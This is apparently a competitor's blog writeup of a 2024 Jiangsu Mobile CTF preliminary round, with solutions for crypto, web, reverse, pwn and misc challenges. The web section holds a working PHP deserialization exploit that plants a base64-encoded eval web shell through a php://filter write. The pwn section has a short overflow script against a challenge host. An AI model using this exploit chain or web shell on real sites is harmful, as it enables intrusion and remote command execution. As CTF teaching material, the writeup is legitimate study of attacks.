Jiangsu Mobile Network Security Competition 2024 (Preliminary Round)

This post was last updated on the evening of 16 November 2024

Preface: just slacking off, the writeup of an AI kid

Crypto

easy-sm

Brute-force the last six digits of the password. Have AI write the script; it runs in a little over a minute, and you can try multithreading.

```python
from gmssl import sm3, func

# the given hash value
target_hash = "f1127f0189ad9e1bde949fb14991db82c9c9b41e90edcf014898595e8ab908c0"

# generate candidate passwords and compare
def crack_password():
    prefix = "admin"
    for num in range(1000000):  # 6-digit range
        suffix = f"{num:06}"  # zero-pad to 6 digits
        password = prefix + suffix
        # compute the SM3 hash of the candidate
        hash_value = sm3.sm3_hash(func.bytes_to_list(password.encode()))
        if hash_value == target_hash:
            return password
    return None

# run the crack
password = crack_password()
if password:
    print(f"找到密码:flag{{{password}}}")
else:
    print("未找到匹配的密码")
```

easy-train

First base62-decode, then atbash; based on the properties of a UUID, use rot13 to shift the letters into the plausible range.


Then brute-force it with 随波逐流 and see what comes out to get the flag.


web

web sign-in

Shiro framework; use the framework tool in OneFox.

First brute-force the key,

then just run commands directly.


web2

```php
<?php
highlight_file(__FILE__);
class Who{
    public $char;
    public function __construct(){
        $this->char = new Zhangsan;
    }
    public function __toString(){
        if (isset($this->char)){
            return $this->char->Nihao();
        }else{
            return "You look upset";
        }
    }
}
class Lisi{
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;

    }
    public function Nihao(){
        $d = '<?php die("nononon");?>';
        $a= $d. $this->text;
        @file_put_contents($this-> file,$a);
    }
}
class Zhangsan{
    public function Nihao(){
        return "I'm so happy";
    }
}

echo unserialize($_GET['a']);
```

Source above. Locating the key code shows a die() guard that can be bypassed; bypass it with base64 decoding. Here is the exp:

```php
<?php
class Who{
    public $char;
    public function __construct(){
        $this->char = new Zhangsan;
    }
    public function __toString(){
        if (isset($this->char)){
            return $this->char->Nihao();
        }else{
            return "You look upset";
        }
    }
}
class Lisi{
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;

    }
    public function Nihao(){
        $d = '<?php die("nononon");?>';
        $a= $d. $this->text;
        @file_put_contents($this-> file,$a);
    }
}
class Zhangsan{
    public function Nihao(){
        return "I'm so happy";
    }
}

$exp=new Who;
$exp->char = new Lisi;
$exp->char->file ="php://filter/write=convert.base64-decode/resource=orange.php";
$exp->char->text ="aaaPD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4=";
// pad so that the length works out to a multiple of four
echo urlencode(serialize($exp));
```

```
O%3A3%3A%22Who%22%3A1%3A%7Bs%3A4%3A%22char%22%3BO%3A4%3A%22Lisi%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A60%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3Dorange.php%22%3Bs%3A4%3A%22text%22%3Bs%3A35%3A%22aaaPD9waHAgZXZhbCgkX0dFVFsxXSk7Pz4%3D%22%3B%7D%7D
```

Finally, run commands.
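Why the die() prefix does not protect the write, as an added example that is not part of the writeup: it models PHP's convert.base64-decode filter on the `$d . $text` string from Lisi::Nihao() (the assumption, from the filter's documented behaviour, is that bytes outside the base64 alphabet are skipped), shows why exactly three filler bytes are needed, and adds two checks a defender would want. MARKER is a constructed benign stand-in for the payload.

```python
import base64
import re
import string

# bytes the convert.base64-decode filter feeds to the decoder (assumption: all others are skipped)
B64_ALPHABET = frozenset((string.ascii_letters + string.digits + "+/=").encode())

# the guard string from the challenge source
DIE_PREFIX = b'<?php die("nononon");?>'


def surviving_chars(data: bytes) -> bytes:
    """Keep only the bytes the filter will actually decode."""
    return bytes(b for b in data if b in B64_ALPHABET)


def decode_like_filter(data: bytes) -> bytes:
    """Decode as the filter would: skip foreign bytes, drop an incomplete final 4-char group."""
    kept = surviving_chars(data)
    kept = kept[: len(kept) - len(kept) % 4]
    return base64.b64decode(kept)


def simulate_write(text: bytes) -> bytes:
    """What lands on disk when $d . $text is written through the decode filter."""
    return decode_like_filter(DIE_PREFIX + text)


def pad_needed(prefix: bytes = DIE_PREFIX) -> int:
    """Filler chars that push the guard's surviving chars onto a 4-char boundary (13 -> 3)."""
    return (-len(surviving_chars(prefix))) % 4


def guard_survives(written: bytes) -> bool:
    """Defender check: is the die() guard still at the start of the written file?"""
    return written.startswith(DIE_PREFIX)


def is_stream_wrapper(path: str) -> bool:
    """Defender check: a scheme:// target such as php://filter must not be accepted as a file path."""
    return re.match(r"^[a-z][a-z0-9+.-]*://", path, re.IGNORECASE) is not None


# constructed, benign stand-in for the payload: 24 bytes -> 32 base64 chars, no '=' padding
MARKER = b"<?php echo 'benign!'; ?>"
MARKER_B64 = base64.b64encode(MARKER)
```

The guard contributes 13 alphabet characters, so with 3 filler bytes the first 16 characters decode to 12 bytes of junk and everything after decodes cleanly; the real fix is to never unserialize user input and to refuse wrapper paths for writes.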


re

RE sign-in

Just read the attachment and concatenate the pieces.

```c
strcpy(v5, "flag{");
strcat(v5, "re_1");
strcat(v5, "basic_re");
strcat(v5, "_12}");
printf("Welcome!");
```

```
flag{re_1basic_re_12}
```

HappySunday

Open it in IDA and look at main.


It requires the input to start with flag{ and end with a } character. The input string goes through sub_140001010 and sub_140001630, then into sub_140001680; if the comparison succeeds it prints "successed".

Look at the contents of 1010.


It looks like a base64 encoding routine; go into 4400 to see what is there.


Converting it to characters first gives a base64-like table: ABCDEFGHIJKLMN0PQRSTUVWXYZabcdefghijklmnOpqrstuvwxyzo123456789+/

```python
ida_chars = [0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A,
             0x4B, 0x4C, 0x4D, 0x4E, 0x30, 0x50, 0x51, 0x52, 0x53, 0x54,
             0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62, 0x63, 0x64,
             0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E,
             0x4F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78,
             0x79, 0x7A, 0x6F, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
             0x38, 0x39, 0x2B, 0x2F]
for i in range(len(ida_chars)):
    print(chr(ida_chars[i]), end="")
```

Go into 1630.


You can see it is a loop that XORs with 0x78.


Write the exp.

```python
import base64
result = ""
chars = [0x7A, 0x36, 0x17, 0x3A, 0x34, 0x35, 0x49, 0x40, 0x17, 0x20,
         0x49, 0x31, 0x02, 0x2D, 0x02, 0x1C, 0x1E, 0x35, 0x3D, 0x4D,
         0x1E, 0x1B, 0x49, 0x2E, 0x0D, 0x2A, 0x3C, 0x2A, 0x4D, 0x2D,
         0x00, 0x00]
for i in range(0, 29):
    chars[i] = chars[i] ^ 0x78
result = ''.join([chr(a) for a in chars])
CHAR_DATA = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
New = "ABCDEFGHIJKLMN0PQRSTUVWXYZabcdefghijklmnOpqrstuvwxyzo123456789+/"
print(base64.b64decode(result.translate(str.maketrans(New, CHAR_DATA))))
```

pwn

pwn1

Just overflow straight into the shell.

```python
from pwn import *
p = remote('221.178.230.105', 35765)
payload = b'a'*16 + b'admin'
p.sendline(payload)
p.interactive()
```


Misc

keyboard

A keystroke traffic capture.

Grab a script online and run it in one go; nothing hard about it.

```python
#!/usr/bin/env python
# coding:utf-8
import argparse
import os
from tempfile import NamedTemporaryFile

BOOT_KEYBOARD_MAP = {
    0x00: (None, None),  # Reserved (no event indicated)
    0x01: ('', ''),  # ErrorRollOver
    0x02: ('', ''),  # POSTFail
    0x03: ('', ''),  # ErrorUndefined
    0x04: ('a', 'A'),  # a
    0x05: ('b', 'B'),  # b
    0x06: ('c', 'C'),  # c
    0x07: ('d', 'D'),  # d
    0x08: ('e', 'E'),  # e
    0x09: ('f', 'F'),  # f
    0x0a: ('g', 'G'),  # g
    0x0b: ('h', 'H'),  # h
    0x0c: ('i', 'I'),  # i
    0x0d: ('j', 'J'),  # j
    0x0e: ('k', 'K'),  # k
    0x0f: ('l', 'L'),  # l
    0x10: ('m', 'M'),  # m
    0x11: ('n', 'N'),  # n
    0x12: ('o', 'O'),  # o
    0x13: ('p', 'P'),  # p
    0x14: ('q', 'Q'),  # q
    0x15: ('r', 'R'),  # r
    0x16: ('s', 'S'),  # s
    0x17: ('t', 'T'),  # t
    0x18: ('u', 'U'),  # u
    0x19: ('v', 'V'),  # v
    0x1a: ('w', 'W'),  # w
    0x1b: ('x', 'X'),  # x
    0x1c: ('y', 'Y'),  # y
    0x1d: ('z', 'Z'),  # z
    0x1e: ('1', '!'),  # 1
    0x1f: ('2', '@'),  # 2
    0x20: ('3', '#'),  # 3
    0x21: ('4', '$'),  # 4
    0x22: ('5', '%'),  # 5
    0x23: ('6', '^'),  # 6
    0x24: ('7', '&'),  # 7
    0x25: ('8', '*'),  # 8
    0x26: ('9', '('),  # 9
    0x27: ('0', ')'),  # 0
    0x28: ('\n', '\n'),  # Return (ENTER)
    0x29: ('[ESC]', '[ESC]'),  # Escape
    0x2a: ('\b', '\b'),  # Backspace
    0x2b: ('\t', '\t'),  # Tab
    0x2c: (' ', ' '),  # Spacebar
    0x2d: ('-', '_'),  # -
    0x2e: ('=', '+'),  # =
    0x2f: ('[', '{'),  # [
    0x30: (']', '}'),  # ]
    0x31: ('\\', '|'),  # \
    0x32: ('', ''),  # Non-US # and ~
    0x33: (';', ':'),  # ;
    0x34: ('\'', '"'),  # '
    0x35: ('`', '~'),  # `
    0x36: (',', '<'),  # ,
    0x37: ('.', '>'),  # .
    0x38: ('/', '?'),  # /
    0x39: ('[CAPSLOCK]', '[CAPSLOCK]'),  # Caps Lock
    0x3a: ('[F1]', '[F1]'),  # F1
    0x3b: ('[F2]', '[F2]'),  # F2
    0x3c: ('[F3]', '[F3]'),  # F3
    0x3d: ('[F4]', '[F4]'),  # F4
    0x3e: ('[F5]', '[F5]'),  # F5
    0x3f: ('[F6]', '[F6]'),  # F6
    0x40: ('[F7]', '[F7]'),  # F7
    0x41: ('[F8]', '[F8]'),  # F8
    0x42: ('[F9]', '[F9]'),  # F9
    0x43: ('[F10]', '[F10]'),  # F10
    0x44: ('[F11]', '[F11]'),  # F11
    0x45: ('[F12]', '[F12]'),  # F12
    0x46: ('[PRINTSCREEN]', '[PRINTSCREEN]'),  # Print Screen
    0x47: ('[SCROLLLOCK]', '[SCROLLLOCK]'),  # Scroll Lock
    0x48: ('[PAUSE]', '[PAUSE]'),  # Pause
    0x49: ('[INSERT]', '[INSERT]'),  # Insert
    0x4a: ('[HOME]', '[HOME]'),  # Home
    0x4b: ('[PAGEUP]', '[PAGEUP]'),  # Page Up
    0x4c: ('[DELETE]', '[DELETE]'),  # Delete Forward
    0x4d: ('[END]', '[END]'),  # End
    0x4e: ('[PAGEDOWN]', '[PAGEDOWN]'),  # Page Down
    0x4f: ('[RIGHTARROW]', '[RIGHTARROW]'),  # Right Arrow
    0x50: ('[LEFTARROW]', '[LEFTARROW]'),  # Left Arrow
    0x51: ('[DOWNARROW]', '[DOWNARROW]'),  # Down Arrow
    0x52: ('[UPARROW]', '[UPARROW]'),  # Up Arrow
    0x53: ('[NUMLOCK]', '[NUMLOCK]'),  # Num Lock
    0x54: ('[KEYPADSLASH]', '/'),  # Keypad /
    0x55: ('[KEYPADASTERISK]', '*'),  # Keypad *
    0x56: ('[KEYPADMINUS]', '-'),  # Keypad -
    0x57: ('[KEYPADPLUS]', '+'),  # Keypad +
    0x58: ('[KEYPADENTER]', '[KEYPADENTER]'),  # Keypad ENTER
    0x59: ('[KEYPAD1]', '1'),  # Keypad 1 and End
    0x5a: ('[KEYPAD2]', '2'),  # Keypad 2 and Down Arrow
    0x5b: ('[KEYPAD3]', '3'),  # Keypad 3 and PageDn
    0x5c: ('[KEYPAD4]', '4'),  # Keypad 4 and Left Arrow
    0x5d: ('[KEYPAD5]', '5'),  # Keypad 5
    0x5e: ('[KEYPAD6]', '6'),  # Keypad 6 and Right Arrow
    0x5f: ('[KEYPAD7]', '7'),  # Keypad 7 and Home
    0x60: ('[KEYPAD8]', '8'),  # Keypad 8 and Up Arrow
    0x61: ('[KEYPAD9]', '9'),  # Keypad 9 and Page Up
    0x62: ('[KEYPAD0]', '0'),  # Keypad 0 and Insert
    0x63: ('[KEYPADPERIOD]', '.'),  # Keypad . and Delete
    0x64: ('', ''),  # Non-US \ and |
    0x65: ('', ''),  # Application
    0x66: ('', ''),  # Power
    0x67: ('[KEYPADEQUALS]', '='),  # Keypad =
    0x68: ('[F13]', '[F13]'),  # F13
    0x69: ('[F14]', '[F14]'),  # F14
    0x6a: ('[F15]', '[F15]'),  # F15
    0x6b: ('[F16]', '[F16]'),  # F16
    0x6c: ('[F17]', '[F17]'),  # F17
    0x6d: ('[F18]', '[F18]'),  # F18
    0x6e: ('[F19]', '[F19]'),  # F19
    0x6f: ('[F20]', '[F20]'),  # F20
    0x70: ('[F21]', '[F21]'),  # F21
    0x71: ('[F22]', '[F22]'),  # F22
    0x72: ('[F23]', '[F23]'),  # F23
    0x73: ('[F24]', '[F24]'),  # F24
}


def parse_boot_keyboard_report(data: bytearray):
    # byte 0: modifier bitmap, byte 1: reserved, bytes 2-7: up to six pressed keycodes
    modifiers = data[0]
    keys = data[2:8]

    ctrl = (modifiers & 0x11) != 0
    shift = (modifiers & 0x22) != 0
    alt = (modifiers & 0x44) != 0
    gui = (modifiers & 0x88) != 0

    characters = []
    for key in keys:
        if key != 0:
            if key in BOOT_KEYBOARD_MAP:
                # shift is a bool, so it indexes the (unshifted, shifted) tuple
                characters.append(BOOT_KEYBOARD_MAP[key][shift])
            else:
                characters.append(None)
    return (ctrl, shift, alt, gui, characters)


def help_formatter(prog):
    return argparse.HelpFormatter(prog, max_help_position=40)


def main():
    parser = argparse.ArgumentParser(
        description='Parse keyboard report data and output as text', formatter_class=help_formatter)
    parser.add_argument('pcapng_file', help='path to the pcapng file')
    args = parser.parse_args()

    tmpfile = NamedTemporaryFile(delete=False)
    tmpfile.close()

    # let tshark dump the HID report bytes, one report per line
    command = "tshark -r %s -T fields -e usbhid.data -e usb.capdata > %s" % (
        args.pcapng_file, tmpfile.name)
    os.system(command)

    with open(tmpfile.name, 'r') as f:
        lines = f.readlines()

    os.unlink(tmpfile.name)

    text = ""
    for line in lines:
        capdata = line.strip().replace(':', '')
        if capdata:
            data = bytearray.fromhex(capdata)
            characters = parse_boot_keyboard_report(data)[-1]
            for character in characters:
                if character:
                    text += character
                else:
                    pass

    raw_text = repr(text)
    print(f'Raw output:\n{raw_text}')
    print(f'Text output:\n{text}')


if __name__ == "__main__":
    main()
```


bft

The challenge description says it is bft steganography; use bfttools to get the text.

```brainfuck
+++++++++[->+++++++++<]>+++++++++.<++++[->++++<]>+++.<+++[->+++<]>++.<++++[->----<]>.<+++[->---<]>-----.<++++++[->------<]>---.<++++++++[->++++++++<]>.+++++++.<++++++[->------<]>---------.<+++++[->+++++<]>++++.------.++++.<+++++[->-----<]>-.<+++++[->+++++<]>++++++.<+++++[->-----<]>-------.<+++++[->-----<]>----.<+++++[->+++++<]>++++.<++++++[->++++++<]>+++++++++.<+++++++[->-------<]>--------.<++++[->----<]>-.<++++++[->++++++<]>+++++.--.------.<+++++[->-----<]>-------.<+++++[->+++++<]>+++++.+++++.-------.<+++++[->-----<]>.<++++++[->++++++<]>++.---.<++++[->----<]>-.<++++++[->++++++<]>+++.<+++++[->-----<]>-------.------.<+++[->+++<]>++++++.<++++[->++++<]>+++++++.<++++[->----<]>----.<++++[->++++<]>+.<++++[->----<]>.<++++[->++++<]>.<++++[->----<]>-.<+++++[->+++++<]>++++++++.<++++++[->------<]>--------.<+++++[->+++++<]>+++++.<+++++[->-----<]>-----.++++++.------.<+++++[->+++++<]>++++.<++++[->----<]>--.<++++++[->------<]>--.---.<+++[->+++<]>++++.<
```

Decode it online.


Then base-decode it,

which gives flag{327a6c4304ad5938eaf0efb6cc3e53dc}.
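The same two steps done offline, as an added example that is not part of the writeup: a small brainfuck interpreter runs the program quoted above, and its output is base64-decoded as the writeup's final step does. PROGRAM is the page's program copied verbatim; the interpreter itself is constructed here.

```python
import base64

# the brainfuck program from the challenge, copied from the writeup
PROGRAM = "+++++++++[->+++++++++<]>+++++++++.<++++[->++++<]>+++.<+++[->+++<]>++.<++++[->----<]>.<+++[->---<]>-----.<++++++[->------<]>---.<++++++++[->++++++++<]>.+++++++.<++++++[->------<]>---------.<+++++[->+++++<]>++++.------.++++.<+++++[->-----<]>-.<+++++[->+++++<]>++++++.<+++++[->-----<]>-------.<+++++[->-----<]>----.<+++++[->+++++<]>++++.<++++++[->++++++<]>+++++++++.<+++++++[->-------<]>--------.<++++[->----<]>-.<++++++[->++++++<]>+++++.--.------.<+++++[->-----<]>-------.<+++++[->+++++<]>+++++.+++++.-------.<+++++[->-----<]>.<++++++[->++++++<]>++.---.<++++[->----<]>-.<++++++[->++++++<]>+++.<+++++[->-----<]>-------.------.<+++[->+++<]>++++++.<++++[->++++<]>+++++++.<++++[->----<]>----.<++++[->++++<]>+.<++++[->----<]>.<++++[->++++<]>.<++++[->----<]>-.<+++++[->+++++<]>++++++++.<++++++[->------<]>--------.<+++++[->+++++<]>+++++.<+++++[->-----<]>-----.++++++.------.<+++++[->+++++<]>++++.<++++[->----<]>--.<++++++[->------<]>--.---.<+++[->+++<]>++++.<"


def run_bf(program: str, tape_size: int = 30000) -> str:
    """Execute a brainfuck program with 8-bit wrapping cells and return its output."""
    # precompute matching bracket positions so every jump is O(1) and unbalanced code is rejected
    jumps, stack = {}, []
    for pos, ch in enumerate(program):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at {pos}")
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError(f"unmatched '[' at {stack[-1]}")

    tape = [0] * tape_size
    ptr = pc = 0
    out = []
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1  # ',' is not implemented: this program takes no input
    return "".join(out)


def decode_flag(program: str = PROGRAM) -> str:
    """Run the program and base64-decode what it prints, as the writeup does."""
    return base64.b64decode(run_bf(program)).decode()


if __name__ == "__main__":
    print(run_bf(PROGRAM))
    print(decode_flag())
```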

dns

dns.qry.name carries the data; convert the capture to JSON with tshark and extract it with a regex.

```python
import re

# open the file and process it line by line (the list is built while the file is still open)
with open("orange.json", "r", encoding='utf-8') as f:
    data = [match.group(1)
            for line in f
            for match in [re.search(r'"dns\.qry\.name": "([0123456789abcdef]+)\.\d+\.\d+\.\d+\.\d+"', line)]
            if match]

# filter the data and take one of every four, as required
result = [dns for i, dns in enumerate(data) if i % 4 == 0]

# join the pieces into one string
d = ''.join(result)
print(d)
```

```shell
tshark -T json -r dns.pcap > orange.json
```

Then run the script to get:

```
56476870637942706379426849484e6c59334a6c64434230636d4675633231706448526c5a43423061484a766457646f494752756379427864575679655341364b534247544546484c555a554e44646a545667794e6e425865555a5453545a53554664685533493157564a330a
```


Finally decode it in CyberChef to get the flag.
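The same pattern from the detection side, as an added example that is not part of the writeup: the writeup's regex over tshark JSON lines, plus a length threshold for hex-only labels and a hex-then-base64 reassembly. The capture lines are constructed here to stand in for orange.json, and repeats of each query are collapsed by deduplicating consecutive identical labels (an assumption; the writeup instead keeps every fourth match).

```python
import base64
import json
import re

# the query-name shape the writeup matches: a hex label followed by four numeric labels
QRY_RE = re.compile(r'"dns\.qry\.name": "([0-9a-f]+)\.\d+\.\d+\.\d+\.\d+"')
# a pure-hex label at least this long is treated as encoded data rather than a hostname (chosen threshold)
MIN_HEX_LABEL = 16


def suspicious_labels(lines):
    """Yield the hex label of every line that matches the exfiltration shape and length threshold."""
    for line in lines:
        m = QRY_RE.search(line)
        if m and len(m.group(1)) >= MIN_HEX_LABEL:
            yield m.group(1)


def reassemble(lines) -> bytes:
    """Collapse consecutive repeats, join the hex, then undo hex and base64 as the writeup does."""
    chunks, last = [], None
    for label in suspicious_labels(lines):
        if label != last:  # limitation: two genuinely identical adjacent chunks would merge
            chunks.append(label)
            last = label
    return base64.b64decode(bytes.fromhex("".join(chunks)))


def build_sample_lines(secret: bytes, chunk: int = 32, repeats: int = 4):
    """Constructed capture: base64 -> hex -> 32-char labels, each query seen `repeats` times."""
    hexdata = base64.b64encode(secret).hex()
    lines = []
    for i in range(0, len(hexdata), chunk):
        label = hexdata[i:i + chunk]
        entry = json.dumps({"dns.qry.name": f"{label}.10.0.0.{i // chunk}"})
        lines.extend([entry] * repeats)
    # a short hex-looking label that an ordinary hostname could carry; must stay below the threshold
    lines.append(json.dumps({"dns.qry.name": "beef.10.0.0.9"}))
    return lines


# constructed secret; 41 bytes -> 56 base64 chars -> 112 hex chars -> labels of 32, 32, 32, 16
SECRET = b"constructed sample: flag{not-a-real-flag}"
SAMPLE_LINES = build_sample_lines(SECRET)

if __name__ == "__main__":
    print(reassemble(SAMPLE_LINES))
```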


https://0ran9ewww.github.io/2024/11/16/江苏移动/wp/
Author: orange
Published 16 November 2024